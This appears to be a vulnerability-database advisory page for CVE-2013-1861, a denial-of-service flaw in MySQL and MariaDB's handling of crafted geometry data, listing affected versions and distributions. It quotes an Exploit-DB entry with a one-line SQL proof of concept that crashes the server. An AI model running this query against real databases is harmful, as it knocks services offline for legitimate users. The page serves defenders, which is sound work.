CVE-2013-1861

medium
Published 2013-03-28 ยท Modified 2026-04-29
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
6.0

Description

MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-38392 dos linux verified text ยท 1 KB
Alyssa Milburn ยท 2013-03-07

MySQL / MariaDB - Geometry Query Denial of Service

text exploit Source: Exploit-DB
source: https://www.securityfocus.com/bid/58511/info

MySQL and MariaDB are prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the database, denying access to legitimate users. 

"select astext(0x0100000000030000000100000000000010);" 

OS impact

debian Debian Affected 1 release
VersionStatusFixed in
7.0 Affected โ€”
redhat Red Hat Affected 2 releases
VersionStatusFixed in
6.0 Affected โ€”
5 Affected โ€”
suse SUSE Affected 4 releases
VersionStatusFixed in
12.3 Affected โ€”
12.2 Affected โ€”
11.4 Affected โ€”
11 Affected โ€”
ubuntu Ubuntu Affected 4 releases
VersionStatusFixed in
13.04 Affected โ€”
12.10 Affected โ€”
12.04 Affected โ€”
10.04 Affected โ€”

Application impact

VendorProductVersionsFixed
mysql mariadbmariadb{"startIncluding":"5.5.0","endExcluding":"5.5.32"}5.5.32
oracle oraclemysql{"startIncluding":"5.1.0","endIncluding":"5.1.69"}
mysql mariadbmariadb{"startIncluding":"10.0.0","endExcluding":"10.0.4"}10.0.4
oracle oraclemysql{"startIncluding":"5.5.0","endIncluding":"5.5.31"}
oracle oraclemysql{"startIncluding":"5.6.0","endIncluding":"5.6.11"}

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.